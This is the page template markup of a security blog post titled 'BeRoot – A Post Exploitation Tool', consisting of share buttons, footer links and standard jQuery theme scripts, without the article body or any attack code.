rel='nofollow' target='_blank'><i class='fa fa-facebook'></i><span>Share it</span></a> <a class='twitter' href='https://twitter.com/share?url=https://nexus-decode.blogspot.com/2018/07/beroot-post-exploitation-tool-to-check.html&title=BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS' onclick='window.open(this.href, &#39;windowName&#39;, &#39;width=600, height=400, left=24, top=24, scrollbars, resizable&#39;); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter'></i><span>Tweet it</span></a> <a class='googleplus' href='https://plus.google.com/share?url=https://nexus-decode.blogspot.com/2018/07/beroot-post-exploitation-tool-to-check.html&title=BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS' onclick='window.open(this.href, &#39;windowName&#39;, &#39;width=600, height=400, left=24, top=24, scrollbars, resizable&#39;); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus'></i><span>Share it</span></a> <a class='linkedin' href='https://www.linkedin.com/shareArticle?url=https://nexus-decode.blogspot.com/2018/07/beroot-post-exploitation-tool-to-check.html&title=BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS' onclick='window.open(this.href, &#39;windowName&#39;, &#39;width=600, height=400, left=24, top=24, scrollbars, resizable&#39;); return false;' rel='nofollow' target='_blank'><i class='fa fa-linkedin'></i><span>Share it</span></a> <a class='pinterest' href='https://pinterest.com/pin/create/button/?url=https://nexus-decode.blogspot.com/2018/07/beroot-post-exploitation-tool-to-check.html&media=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8eOoe44o7mVMROybePnxyxHofDk0TGShNGBIOIdu219RcOxPsXdIEXHvdiF5JhWVYHkg_KBQnt8Ub9BOX5ABy7lESalHn74pOjo83UFcXN2DdRXfo1QzrnhC5OLzFI4TyYEt0iHiODflN/s1600/Windows+and+Linux+post+Exploitation.png&description=BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS  A compiled version is available  here . It ...' onclick='window.open(this.href, &#39;windowName&#39;, &#39;width=600, height=400, left=24, top=24, scrollbars, resizable&#39;); return false;' rel='nofollow' target='_blank'><i class='fa fa-pinterest-p'></i><span>Pin it</span></a> </div> <div style='clear:both'></div> <div id='related-posts'> <h4 class='related-headline'>You Might Also Like</h4> <div class='related-ready'> </div> </div> <script type='text/javascript'> var id_user = 329219; var domains_include = ['google.com', 'nexus-decode.blogspot.com.com', 'bing.com']; </script> <div class='clear'></div> <ul class='post-nav'> <li class='next'> <a class='newer-link' href='https://nexus-decode.blogspot.com/2018/07/5g-world-alliance-australia-needs-more.html' id='Blog1_blog-pager-newer-link' rel='next'></a> </li> <li class='previous'> <a class='older-link' href='https://nexus-decode.blogspot.com/2018/07/chinas-boe-display-said-to-supply-oled.html' id='Blog1_blog-pager-older-link' rel='previous'></a> </li> </ul> </div> <div itemprop='publisher' itemscope='itemscope' itemtype='https://schema.org/Organization' style='display:none;'> <div itemprop='logo' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta content='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8eOoe44o7mVMROybePnxyxHofDk0TGShNGBIOIdu219RcOxPsXdIEXHvdiF5JhWVYHkg_KBQnt8Ub9BOX5ABy7lESalHn74pOjo83UFcXN2DdRXfo1QzrnhC5OLzFI4TyYEt0iHiODflN/s1600/Windows+and+Linux+post+Exploitation.png' itemprop='url'/> </div> <meta content='Nexus' itemprop='name'/> </div> </div> </div> <script type='text/javascript'> //<![CDATA[ $(".index .post-outer,.archive .post-outer").each(function() { $(this).find(".block-image .thumb a").attr("style", function(e, t) { return t.replace("/default.jpg", "/mqdefault.jpg") }).attr("style", function(e, t) { return t.replace("s72-c", "s1600") }) }); //]]> </script> <div class='comments' id='comments'> <a name='comments'></a> <div id='backlinks-container'> <div id='Blog1_backlinks-container'> </div> </div> </div> </div> <!--Can't find substitution for tag [adEnd]--> </div> <div class='post-feeds'> </div> </div></div> </div> <div class='sidebar-wrapper'> <div class='sidebar section' id='sidebar' name='Sidebar Right A'> <div class='widget HTML' data-version='1' id='HTML4'> <h2 class='title'>Recent Posts</h2> <div class='widget-content'> </div> </div><div class='widget HTML' data-version='1' id='HTML8'> <h2 class='title'>Facebook</h2> <div class='widget-content'> </div> </div></div> </div> <div class='clear'></div> </div><center> <!-- end content-wrapper --> <script type='text/javascript'> var id_user = 329219; var domains_include = ['google.com', 'nexus-decode.blogspot.com.com', 'bing.com']; </script> </center> <div class='clear'></div><!-- Footer wrapper --> <div class='footer-wrapper'> <div class='footer-sec row'> <!-- Footer Social --> <div class='social-footer section' id='social-footer' name='Social Footer'><div class='widget LinkList' data-version='1' id='LinkList20'> <div class='widget-content'> <ul> <li><a class='gplus' href='#' target='_blank' title='gplus'></a></li> <li><a class='youtube' href='#' target='_blank' title='youtube'></a></li> <li><a class='instagram' href='#' target='_blank' title='instagram'></a></li> <li><a class='twitter' href='#' target='_blank' title='twitter'></a></li> <li><a class='facebook' href='#' target='_blank' title='facebook'></a></li> </ul> </div> </div></div> <!-- Footer Copyright --> <div class='copyright'><p>Created By <a href='https://nexus-decode.blogspot.com/' id='mycontent' title='Blogger Templates'>Nexus</a> &#183; Powered by <a href='https://www.blogger.com'>Blogger</a> <br/>&#169; All Rights Reserved</p> <a aria-current='page' href='https://nexus-decode.blogspot.com/p/terms-of-service-these-terms-and.html'>Terms Of Service </a>&#183;<a href='https://nexus-decode.blogspot.com/p/privacy-policy.html'> Privacy Policy </a>&#183;<a href='https://nexus-decode.blogspot.com/p/blog-page.html'> Disclaimer </a>&#183;<a href='mailto:cybergeekofficial@gmail.com'> Contact Us </a>&#183;<a href='https://nexus-decode.blogspot.com/p/about-us.html'> About Us </a></div> </div> </div> <script> /*<![CDATA[*/ $(function() { $('.widget.LinkList a[href*="behance.net"] i').addClass("fa fa-behance"); $('.widget.LinkList a[href*="facebook.com"] i').addClass("fa fa-facebook"); $('.widget.LinkList a[href*="twitter.com"] i').addClass("fa fa-twitter"); $('.widget.LinkList a[href*="bloglovin.com"] i').addClass("fa fa-heart"); $('.widget.LinkList a[href*="dribbble.com"] i').addClass("fa fa-dribbble"); $('.widget.LinkList a[href*="flickr.com"] i').addClass("fa fa-flickr"); $('.widget.LinkList a[href*="snapchat.com"] i').addClass("fa fa-snapchat"); $('.widget.LinkList a[href*="plus.google.com"] i').addClass("fa fa-google-plus"); $('.widget.LinkList a[href*="instagram.com"] i').addClass("fa fa-instagram"); $('.widget.LinkList a[href*="linkedin.com"] i').addClass("fa fa-linkedin"); $('.widget.LinkList a[href*="pinterest.com"] i').addClass("fa fa-pinterest"); $('.widget.LinkList a[href*="vimeo.com"] i').addClass("fa fa-vimeo-square"); $('.widget.LinkList a[href*="youtube.com"] i').addClass("fa fa-youtube"); $('.widget.LinkList a[href*="vine.co"] i').addClass("fa fa-vine"); $('.widget.LinkList a[href*="soundcloud.com"] i').addClass("fa fa-soundcloud"); $('.widget.LinkList a[href*="goodreads.com"] i').addClass("fa fa-book"); $('.widget.LinkList a[href*="deviantart.com"] i').addClass("fa fa-deviantart"); $('.widget.LinkList a[href*="foursquare.com"] i').addClass("fa fa-foursquare"); $('.widget.LinkList a[href*="reddit.com"] i').addClass("fa fa-reddit"); $('.widget.LinkList a[href*="tumblr.com"] i').addClass("fa fa-tumblr"); $('.widget.LinkList a[href*="spotify.com"] i').addClass("fa fa-spotify"); $('.widget.LinkList a[href*="twitch.tv"] i').addClass("fa fa-twitch"); $('.widget.LinkList a[href*="vk.com"] i').addClass("fa fa-vk"); $('.widget.LinkList a[href*="mailto"] i').addClass("fa fa-envelope"); $('.widget.LinkList a[href*="shop"] i').addClass("fa fa-shopping-cart"); $('.widget.LinkList a[href*="feeds/posts/default"] i').addClass("fa fa-rss"); $('.widget.LinkList a[href*="feeds/comments/default"] i').addClass("fa fa-rss"); $('.widget.LinkList a[href*="feeds.feedburner.com"] i').addClass("fa fa-rss"); $('.widget.LinkList a[href*="etsy.com"] i').addClass("fa fa-shopping-cart"); $('.widget.LinkList a[href*="etsy.com"] i').addClass("fa fa-shopping-cart"); $('.widget.LinkList a[href*="behance.net"]').addClass("behance"); $('.widget.LinkList a[href*="facebook.com"]').addClass("facebook"); $('.widget.LinkList a[href*="twitter.com"]').addClass("twitter"); $('.widget.LinkList a[href*="bloglovin.com"]').addClass("bloglovin"); $('.widget.LinkList a[href*="dribbble.com"]').addClass("dribbble"); $('.widget.LinkList a[href*="flickr.com"]').addClass("flickr"); $('.widget.LinkList a[href*="snapchat.com"]').addClass("snapchat"); $('.widget.LinkList a[href*="plus.google.com"]').addClass("google-plus"); $('.widget.LinkList a[href*="instagram.com"]').addClass("instagram"); $('.widget.LinkList a[href*="linkedin.com"]').addClass("linkedin"); $('.widget.LinkList a[href*="pinterest.com"]').addClass("pinterest"); $('.widget.LinkList a[href*="vimeo.com"]').addClass("vimeo"); $('.widget.LinkList a[href*="youtube.com"]').addClass("youtube"); $('.widget.LinkList a[href*="vine.co"]').addClass("vine"); $('.widget.LinkList a[href*="soundcloud.com"]').addClass("soundcloud"); $('.widget.LinkList a[href*="reddit.com"]').addClass("reddit"); $('.widget.LinkList a[href*="vk.com"]').addClass("vk"); $('.widget.LinkList a[href*="facebook.com"] span').replaceWith("<span>like</span>") }); /*]]>*/ </script> <script type='text/javascript'> //<![CDATA[ // Reading Time Author ! function(e) { e.fn.readingTime = function(n) { var t = { readingTimeTarget: ".eta", wordCountTarget: null, wordsPerMinute: 270, round: !0, lang: "en", lessThanAMinuteString: "", prependTimeString: "", prependWordString: "", remotePath: null, remoteTarget: null, success: function() {}, error: function() {} }, i = this, r = e(this); i.settings = e.extend({}, t, n); var a = i.settings; if (!this.length) return a.error.call(this), this; if ("it" == a.lang) var s = a.lessThanAMinuteString || "Meno di un minuto", l = "minute"; else if ("fr" == a.lang) var s = a.lessThanAMinuteString || "Moins d'une minute", l = "minute"; else if ("de" == a.lang) var s = a.lessThanAMinuteString || "Weniger als eine Minute", l = "minute"; else if ("es" == a.lang) var s = a.lessThanAMinuteString || "Menos de un minuto", l = "minute"; else if ("nl" == a.lang) var s = a.lessThanAMinuteString || "Minder dan een minuut", l = "minute"; else if ("sk" == a.lang) var s = a.lessThanAMinuteString || "Menej než minútu", l = "minute"; else if ("cz" == a.lang) var s = a.lessThanAMinuteString || "Méně než minutu", l = "minute"; else if ("hu" == a.lang) var s = a.lessThanAMinuteString || "Kevesebb mint egy perc", l = "perc"; else var s = a.lessThanAMinuteString || "Less than a minute", l = "minute"; var u = function(n) { if ("" !== n) { var t = n.trim().split(/\s+/g).length, i = a.wordsPerMinute / 60, r = t / i; if (a.round === !0) var u = Math.round(r / 60); else var u = Math.floor(r / 60); var g = Math.round(r - 60 * u); if (a.round === !0) e(a.readingTimeTarget).text(u > 0 ? a.prependTimeString + u + " " + l : a.prependTimeString + s); else { var o = u + ":" + g; e(a.readingTimeTarget).text(a.prependTimeString + o) } "" !== a.wordCountTarget && void 0 !== a.wordCountTarget && e(a.wordCountTarget).text(a.prependWordString + t), a.success.call(this) } else a.error.call(this, "The element is empty.") }; r.each(function() { null != a.remotePath && null != a.remoteTarget ? e.get(a.remotePath, function(n) { u(e("<div>").html(n).find(a.remoteTarget).text()) }) : u(r.text()) }) } }(jQuery); $('.post').each(function() { $(this).readingTime({ readingTimeTarget: $(this).find('.eta'), remotePath: $(this).attr('data-file'), remoteTarget: $(this).attr('data-target') }); }); $('.post').readingTime(); //]]> </script> <style> .eta{ display: inline-block; padding-right: 5px; } </style> <!-- //START// Template Settings --> <script> //<![CDATA[ windowWidth = window.innerWidth; //]]> </script> <script> //<![CDATA[ // jquery replacetext plugin (function(e) { e.fn.replaceText = function(t, n, r) { return this.each(function() { var i = this.firstChild, s, o, u = []; if (i) { do { if (i.nodeType === 3) { s = i.nodeValue; o = s.replace(t, n); if (o !== s) { if (!r && /</.test(o)) { e(i).before(o); u.push(i) } else { i.nodeValue = o } } } } while (i = i.nextSibling) } u.length && e(u).remove() }) } })(jQuery); // Timeago jQuery plugin (function(e) { if (typeof define === "function" && define.amd) { define(["jquery"], e) } else { e(jQuery) } })(function(e) { function r() { var n = i(this); var r = t.settings; if (!isNaN(n.datetime)) { if (r.cutoff == 0 || Math.abs(o(n.datetime)) < r.cutoff) { e(this).text(s(n.datetime)) } } return this } function i(n) { n = e(n); if (!n.data("timeago")) { n.data("timeago", { datetime: t.datetime(n) }); var r = e.trim(n.text()); if (t.settings.localeTitle) { n.attr("title", n.data("timeago").datetime.toLocaleString()) } else if (r.length > 0 && !(t.isTime(n) && n.attr("title"))) { n.attr("title", r) } } return n.data("timeago") } function s(e) { return t.inWords(o(e)) } function o(e) { return (new Date).getTime() - e.getTime() } e.timeago = function(t) { if (t instanceof Date) { return s(t) } else if (typeof t === "string") { return s(e.timeago.parse(t)) } else if (typeof t === "number") { return s(new Date(t)) } else { return s(e.timeago.datetime(t)) } }; var t = e.timeago; e.extend(e.timeago, { settings: { refreshMillis: 6e4, allowPast: true, allowFuture: false, localeTitle: false, cutoff: 0, strings: { prefixAgo: null, prefixFromNow: null, suffixAgo: "ago", suffixFromNow: "from now", inPast: "in a moment", seconds: "a few seconds", minute: "%d minute", minutes: "%d mins", hour: "%d hour", hours: "%d hrs", day: "%d day", days: "%d days", month: "month", months: "%d months", year: "%d year", years: "%d years", wordSeparator: " ", numbers: [] } }, inWords: function(t) { function l(r, i) { var s = e.isFunction(r) ? r(i, t) : r; var o = n.numbers && n.numbers[i] || i; return s.replace(/%d/i, o) } if (!this.settings.allowPast && !this.settings.allowFuture) { throw "timeago allowPast and allowFuture settings can not both be set to false." } var n = this.settings.strings; var r = n.prefixAgo; var i = n.suffixAgo; if (this.settings.allowFuture) { if (t < 0) { r = n.prefixFromNow; i = n.suffixFromNow } } if (!this.settings.allowPast && t >= 0) { return this.settings.strings.inPast } var s = Math.abs(t) / 1e3; var o = s / 60; var u = o / 60; var a = u / 24; var f = a / 365; var c = s < 45 && l(n.seconds, Math.round(s)) || s < 90 && l(n.minute, 1) || o < 45 && l(n.minutes, Math.round(o)) || o < 90 && l(n.hour, 1) || u < 24 && l(n.hours, Math.round(u)) || u < 42 && l(n.day, 1) || a < 30 && l(n.days, Math.round(a)) || a < 45 && l(n.month, 1) || a < 365 && l(n.months, Math.round(a / 30)) || f < 1.5 && l(n.year, 1) || l(n.years, Math.round(f)); var h = n.wordSeparator || ""; if (n.wordSeparator === undefined) { h = " " } return e.trim([r, c, i].join(h)) }, parse: function(t) { var n = e.trim(t); n = n.replace(/\.\d+/, ""); n = n.replace(/-/, "/").replace(/-/, "/"); n = n.replace(/T/, " ").replace(/Z/, " UTC"); n = n.replace(/([\+\-]\d\d)\:?(\d\d)/, " $1$2"); n = n.replace(/([\+\-]\d\d)$/, " $100"); return new Date(n) }, datetime: function(n) { var r = t.isTime(n) ? e(n).attr("datetime") : e(n).attr("title"); return t.parse(r) }, isTime: function(t) { return e(t).get(0).tagName.toLowerCase() === "time" } }); var n = { init: function() { var n = e.proxy(r, this); n(); var i = t.settings; if (i.refreshMillis > 0) { this._timeagoInterval = setInterval(n, i.refreshMillis) } }, update: function(n) { var i = t.parse(n); e(this).data("timeago", { datetime: i }); if (t.settings.localeTitle) e(this).attr("title", i.toLocaleString()); r.apply(this) }, updateFromDOM: function() { e(this).data("timeago", { datetime: t.parse(t.isTime(this) ? e(this).attr("datetime") : e(this).attr("title")) }); r.apply(this) }, dispose: function() { if (this._timeagoInterval) { window.clearInterval(this._timeagoInterval); this._timeagoInterval = null } } }; e.fn.timeago = function(e, t) { var r = e ? n[e] : n.init; if (!r) { throw new Error("Unknown function name '" + e + "' for timeago") } this.each(function() { r.call(this, t) }); return this }; document.createElement("abbr"); document.createElement("time") }); // SelectNav window.selectnav = function() { "use strict"; var e = function(e, t) { function c(e) { var t; if (!e) e = window.event; if (e.target) t = e.target; else if (e.srcElement) t = e.srcElement; if (t.nodeType === 3) t = t.parentNode; if (t.value) window.location.href = t.value } function h(e) { var t = e.nodeName.toLowerCase(); return t === "ul" || t === "ol" } function p(e) { for (var t = 1; document.getElementById("selectnav" + t); t++); return e ? "selectnav" + t : "selectnav" + (t - 1) } function d(e) { a++; var t = e.children.length, n = "", l = "", c = a - 1; if (!t) { return } if (c) { while (c--) { l += o } l += " " } for (var v = 0; v < t; v++) { var m = e.children[v].children[0]; if (typeof m !== "undefined") { var g = m.innerText || m.textContent; var y = ""; if (r) { y = m.className.search(r) !== -1 || m.parentNode.className.search(r) !== -1 ? f : "" } if (i && !y) { y = m.href === document.URL ? f : "" } n += '<option value="' + m.href + '" ' + y + ">" + l + g + "</option>"; if (s) { var b = e.children[v].children[1]; if (b && h(b)) { n += d(b) } } } } if (a === 1 && u) { n = '<option value="">' + u + "</option>" + n } if (a === 1) { n = '<select class="selectnav" id="' + p(true) + '">' + n + "</select>" } a--; return n } e = document.getElementById(e); if (!e) { return } if (!h(e)) { return } if (!("insertAdjacentHTML" in window.document.documentElement)) { return } document.documentElement.className += " js"; var n = t || {}, r = n.activeclass || "active", i = typeof n.autoselect === "boolean" ? n.autoselect : true, s = typeof n.nested === "boolean" ? n.nested : true, o = n.indent || "→", u = n.label || "Menu", a = 0, f = " selected "; e.insertAdjacentHTML("afterend", d(e)); var l = document.getElementById(p()); if (l.addEventListener) { l.addEventListener("change", c) } if (l.attachEvent) { l.attachEvent("onchange", c) } return l }; return function(t, n) { e(t, n) } }(); $(document).ready(function() { selectnav('nav'); selectnav('nav1'); }); // Tabslet jQuery plugin (function($, window, undefined) { $.fn.tabslet = function(options) { var defaults = { mouseevent: "click", attribute: "href", animation: false, autorotate: false, pauseonhover: true, delay: 500, active: 1, controls: { prev: ".prev", next: ".next" } }; var options = $.extend(defaults, options); return this.each(function() { var $this = $(this); options.mouseevent = $this.data("mouseevent") || options.mouseevent; options.attribute = $this.data("attribute") || options.attribute; options.animation = $this.data("animation") || options.animation; options.autorotate = $this.data("autorotate") || options.autorotate; options.pauseonhover = $this.data("pauseonhover") || options.pauseonhover; options.delay = $this.data("delay") || options.delay; options.active = $this.data("active") || options.active; $this.find("> div").hide(); $this.find("> div").eq(options.active - 1).show(); $this.find("> ul li").eq(options.active - 1).addClass("active"); var fn = eval(function() { $(this).trigger("_before"); $this.find("> ul li").removeClass("active"); $(this).addClass("active"); $this.find("> div").hide(); var currentTab = $(this).find("a").attr(options.attribute); if (options.animation) { $this.find(currentTab).animate({ opacity: "show" }, "slow", function() { $(this).trigger("_after") }) } else { $this.find(currentTab).show(); $(this).trigger("_after") } return false }); var init = eval("$this.find('> ul li')." + options.mouseevent + "(fn)"); init; var elements = $this.find("> ul li"), i = options.active - 1; function forward() { i = ++i % elements.length; options.mouseevent == "hover" ? elements.eq(i).trigger("mouseover") : elements.eq(i).click(); var t = setTimeout(forward, options.delay); $this.mouseover(function() { if (options.pauseonhover) { clearTimeout(t) } }) } if (options.autorotate) { setTimeout(forward, 0); if (options.pauseonhover) { $this.on("mouseleave", function() { setTimeout(forward, 1000) }) } } function move(direction) { if (direction == "forward") { i = ++i % elements.length } if (direction == "backward") { i = --i % elements.length } elements.eq(i).click() } $this.find(options.controls.next).click(function() { move("forward") }); $this.find(options.controls.prev).click(function() { move("backward") }); $this.on("destroy", function() { $(this).removeData() }) }) }; $(document).ready(function() { $('[data-toggle="tabslet"]').tabslet() }) })(jQuery); // Simple Tab JQuery Plugin by Taufik Nurrohman (function(a) { a.fn.simplyTab = function(b) { b = jQuery.extend({ active: 1, fx: null, showSpeed: 400, hideSpeed: 400, showEasing: null, hideEasing: null, show: function() {}, hide: function() {}, change: function() {} }, b); return this.each(function() { var e = a(this), c = e.children("[data-tab]"), d = b.active - 1; e.addClass("simplyTab").prepend('<ul class="wrap-tab"></ul>'); c.addClass("content-tab").each(function() { a(this).hide(); e.find(".wrap-tab").append('<li><a href="#">' + a(this).data("tab") + "</a></li>") }).eq(d).show(); e.find(".wrap-tab a").on("click", function() { var f = a(this).parent().index(); a(this).closest(".wrap-tab").find(".activeTab").removeClass("activeTab"); a(this).addClass("activeTab"); if (b.fx == "slide") { if (c.eq(f).is(":hidden")) { c.slideUp(b.hideSpeed, b.hideEasing, function() { b.hide.call(e) }).eq(f).slideDown(b.showSpeed, b.showEasing, function() { b.show.call(e) }) } } else { if (b.fx == "fade") { if (c.eq(f).is(":hidden")) { c.hide().eq(f).fadeIn(b.showSpeed, b.showEasing, function() { b.show.call(e) }) } } else { if (b.fx == "fancyslide") { if (c.eq(f).is(":hidden")) { c.slideUp(b.hideSpeed, b.hideEasing, function() { b.hide.call(e) }).eq(f).delay(b.hideSpeed).slideDown(b.showSpeed, b.showEasing, function() { b.show.call(e) }) } } else { if (c.eq(f).is(":hidden")) { c.hide().eq(f).show() } } } } b.change.call(e); return false }).eq(d).addClass("activeTab") }) } })(jQuery); // SmoothScroll for websites v1.2.1 ! function() { function e() { var e = !1; e && c("keydown", r), v.keyboardSupport && !e && u("keydown", r) } function t() { if (document.body) { var t = document.body, o = document.documentElement, n = window.innerHeight, r = t.scrollHeight; if (S = document.compatMode.indexOf("CSS") >= 0 ? o : t, w = t, e(), x = !0, top != self) y = !0; else if (r > n && (t.offsetHeight <= n || o.offsetHeight <= n)) { var a = !1, i = function() { a || o.scrollHeight == document.height || (a = !0, setTimeout(function() { o.style.height = document.height + "px", a = !1 }, 500)) }; if (o.style.height = "auto", setTimeout(i, 10), S.offsetHeight <= n) { var l = document.createElement("div"); l.style.clear = "both", t.appendChild(l) } } v.fixedBackground || b || (t.style.backgroundAttachment = "scroll", o.style.backgroundAttachment = "scroll") } } function o(e, t, o, n) { if (n || (n = 1e3), d(t, o), 1 != v.accelerationMax) { var r = +new Date, a = r - C; if (a < v.accelerationDelta) { var i = (1 + 30 / a) / 2; i > 1 && (i = Math.min(i, v.accelerationMax), t *= i, o *= i) } C = +new Date } if (M.push({ x: t, y: o, lastX: 0 > t ? .99 : -.99, lastY: 0 > o ? .99 : -.99, start: +new Date }), !T) { var l = e === document.body, u = function() { for (var r = +new Date, a = 0, i = 0, c = 0; c < M.length; c++) { var s = M[c], d = r - s.start, f = d >= v.animationTime, h = f ? 1 : d / v.animationTime; v.pulseAlgorithm && (h = p(h)); var m = s.x * h - s.lastX >> 0, w = s.y * h - s.lastY >> 0; a += m, i += w, s.lastX += m, s.lastY += w, f && (M.splice(c, 1), c--) } l ? window.scrollBy(a, i) : (a && (e.scrollLeft += a), i && (e.scrollTop += i)), t || o || (M = []), M.length ? E(u, e, n / v.frameRate + 1) : T = !1 }; E(u, e, 0), T = !0 } } function n(e) { x || t(); var n = e.target, r = l(n); if (!r || e.defaultPrevented || s(w, "embed") || s(n, "embed") && /\.pdf/i.test(n.src)) return !0; var a = e.wheelDeltaX || 0, i = e.wheelDeltaY || 0; return a || i || (i = e.wheelDelta || 0), !v.touchpadSupport && f(i) ? !0 : (Math.abs(a) > 1.2 && (a *= v.stepSize / 120), Math.abs(i) > 1.2 && (i *= v.stepSize / 120), o(r, -a, -i), void e.preventDefault()) } function r(e) { var t = e.target, n = e.ctrlKey || e.altKey || e.metaKey || e.shiftKey && e.keyCode !== H.spacebar; if (/input|textarea|select|embed/i.test(t.nodeName) || t.isContentEditable || e.defaultPrevented || n) return !0; if (s(t, "button") && e.keyCode === H.spacebar) return !0; var r, a = 0, i = 0, u = l(w), c = u.clientHeight; switch (u == document.body && (c = window.innerHeight), e.keyCode) { case H.up: i = -v.arrowScroll; break; case H.down: i = v.arrowScroll; break; case H.spacebar: r = e.shiftKey ? 1 : -1, i = -r * c * .9; break; case H.pageup: i = .9 * -c; break; case H.pagedown: i = .9 * c; break; case H.home: i = -u.scrollTop; break; case H.end: var d = u.scrollHeight - u.scrollTop - c; i = d > 0 ? d + 10 : 0; break; case H.left: a = -v.arrowScroll; break; case H.right: a = v.arrowScroll; break; default: return !0 } o(u, a, i), e.preventDefault() } function a(e) { w = e.target } function i(e, t) { for (var o = e.length; o--;) z[N(e[o])] = t; return t } function l(e) { var t = [], o = S.scrollHeight; do { var n = z[N(e)]; if (n) return i(t, n); if (t.push(e), o === e.scrollHeight) { if (!y || S.clientHeight + 10 < o) return i(t, document.body) } else if (e.clientHeight + 10 < e.scrollHeight && (overflow = getComputedStyle(e, "").getPropertyValue("overflow-y"), "scroll" === overflow || "auto" === overflow)) return i(t, e) } while (e = e.parentNode) } function u(e, t, o) { window.addEventListener(e, t, o || !1) } function c(e, t, o) { window.removeEventListener(e, t, o || !1) } function s(e, t) { return (e.nodeName || "").toLowerCase() === t.toLowerCase() } function d(e, t) { e = e > 0 ? 1 : -1, t = t > 0 ? 1 : -1, (k.x !== e || k.y !== t) && (k.x = e, k.y = t, M = [], C = 0) } function f(e) { if (e) { e = Math.abs(e), D.push(e), D.shift(), clearTimeout(A); var t = D[0] == D[1] && D[1] == D[2], o = h(D[0], 120) && h(D[1], 120) && h(D[2], 120); return !(t || o) } } function h(e, t) { return Math.floor(e / t) == e / t } function m(e) { var t, o, n; return e *= v.pulseScale, 1 > e ? t = e - (1 - Math.exp(-e)) : (o = Math.exp(-1), e -= 1, n = 1 - Math.exp(-e), t = o + n * (1 - o)), t * v.pulseNormalize } function p(e) { return e >= 1 ? 1 : 0 >= e ? 0 : (1 == v.pulseNormalize && (v.pulseNormalize /= m(1)), m(e)) } var w, g = { frameRate: 150, animationTime: 800, stepSize: 120, pulseAlgorithm: !0, pulseScale: 8, pulseNormalize: 1, accelerationDelta: 20, accelerationMax: 1, keyboardSupport: !0, arrowScroll: 50, touchpadSupport: !0, fixedBackground: !0, excluded: "" }, v = g, b = !1, y = !1, k = { x: 0, y: 0 }, x = !1, S = document.documentElement, D = [120, 120, 120], H = { left: 37, up: 38, right: 39, down: 40, spacebar: 32, pageup: 33, pagedown: 34, end: 35, home: 36 }, v = g, M = [], T = !1, C = +new Date, z = {}; setInterval(function() { z = {} }, 1e4); var A, N = function() { var e = 0; return function(t) { return t.uniqueID || (t.uniqueID = e++) } }(), E = function() { return window.requestAnimationFrame || window.webkitRequestAnimationFrame || function(e, t, o) { window.setTimeout(e, o || 1e3 / 60) } }(), K = /chrome/i.test(window.navigator.userAgent), L = "onmousewheel" in document; L && K && (u("mousedown", a), u("mousewheel", n), u("load", t)) }(); //]]> </script> <script type='text/javascript'> //<![CDATA[ /*GLOBAL SETTINGS, USER CAN CHANGE*/ var MONTH_FORMAT = [, "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]; var NO_IMAGE = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhniDK1OpVdzXGnh-gpgZmzP_TmSYSGZP1fs_PRJOj0YbdnJT0CHi6stxcTIFbqRLe-6aKSWCwbVbwXJcraM7fB42CLn2AY1WDfvD1mp2yITurW7zUqkK0EdkBojg3yL4M3QqChfTCoPb4/s1600-r/nth.png"; var POST_PER_PAGE = 9; // number of posts per page "navigation" var LABEL_SEARCH_NUM = 9; // number of posts labels search var POSTNAV_PREV_TEXT = "Previous"; // post nav text "previous post" var POSTNAV_NEXT_TEXT = "Next"; // post nav text "next post" var COMMENTS_TEXT = "Leave a Comment"; // comments text "leave a comment" // Main Scripts $("#LinkList110").each(function() { var e = "<ul id='nav'><li><ul id='sub-menu'>"; $("#LinkList110 li").each(function() { var t = $(this).text(), n = t.substr(0, 1), r = t.substr(1); "_" == n ? (n = $(this).find("a").attr("href"), e += '<li><a href="' + n + '">' + r + "</a></li>") : (n = $(this).find("a").attr("href"), e += '</ul></li><li><a href="' + n + '">' + t + "</a><ul id='sub-menu'>") }); e += "</ul></li></ul>"; $(this).html(e); $("#LinkList110 ul").each(function() { var e = $(this); if (e.html().replace(/\s|&nbsp;/g, "").length == 0) e.remove() }); $("#LinkList110 li").each(function() { var e = $(this); if (e.html().replace(/\s|&nbsp;/g, "").length == 0) e.remove() }) }); $(document).ready(function() { $(".cmm-tabs").simplyTab({ active: 1, fx: "fade", showSpeed: 400, hideSpeed: 400 }); $("#slink").click(function() { $('#searchbar').toggle() }); $('.blogger-tab').append($('#comments')); $(".cmm-tabs.simplyTab .wrap-tab").wrap("<div class='cmm-tabs-header'/>"); $('.cmm-tabs-header').prepend('<h3>' + COMMENTS_TEXT + '</h3>'); $("#menu").show(); $("ul#sub-menu").parent("li").addClass("hasSub"); $("abbr.timeago").timeago(); $(".footer-sections .widget h2").wrap("<div class='widget-title'/>"); $(".index .post-outer,.archive .post-outer").each(function() { $(this).find(".block-image .thumb a").attr("style", function(e, t) { return t.replace("/default.jpg", "/mqdefault.jpg") }).attr("style", function(e, t) { return t.replace("s72-c", "s1600") }) }); $('.PopularPosts ul li img').each(function() { $(this).attr('src', function(i, src) { return src.replace('/default.jpg', '/mqdefault.jpg') }).attr('src', function(i, src) { return src.replace('s72-c', 's1600') }).attr('src', function(i, src) { return src.replace('w72-h72-p-nu', 's1600') }) }); $(window).scroll(function() { if ($(this).scrollTop() > 200) { $('#back-to-top').fadeIn() } else { $('#back-to-top').fadeOut() } }); $('#back-to-top').hide().click(function() { $('html, body').animate({ scrollTop: 0 }, 800); return false }); var tab1 = $("#sidebar_tabs #tab1 .widget h2").text(); $(".tab-opt .opt-1 a").text(tab1); var tab2 = $("#sidebar_tabs #tab2 .widget h2").text(); $(".tab-opt .opt-2 a").text(tab2); var tab3 = $("#sidebar_tabs #tab3 .widget h2").text(); $(".tab-opt .opt-3 a").text(tab3); $("#tab1 .widget h2,#tab2 .widget h2,#tab3 .widget h2,#tab1 .widget-title,#tab2 .widget-title,#tab3 .widget-title").remove(); $(".sidebar_tabs").tabslet({ mouseevent: "click", attribute: "href", animation: true }); if ($(".sidebar_tabs .widget").length === 0) { $(".sidebar_tabs").remove() } 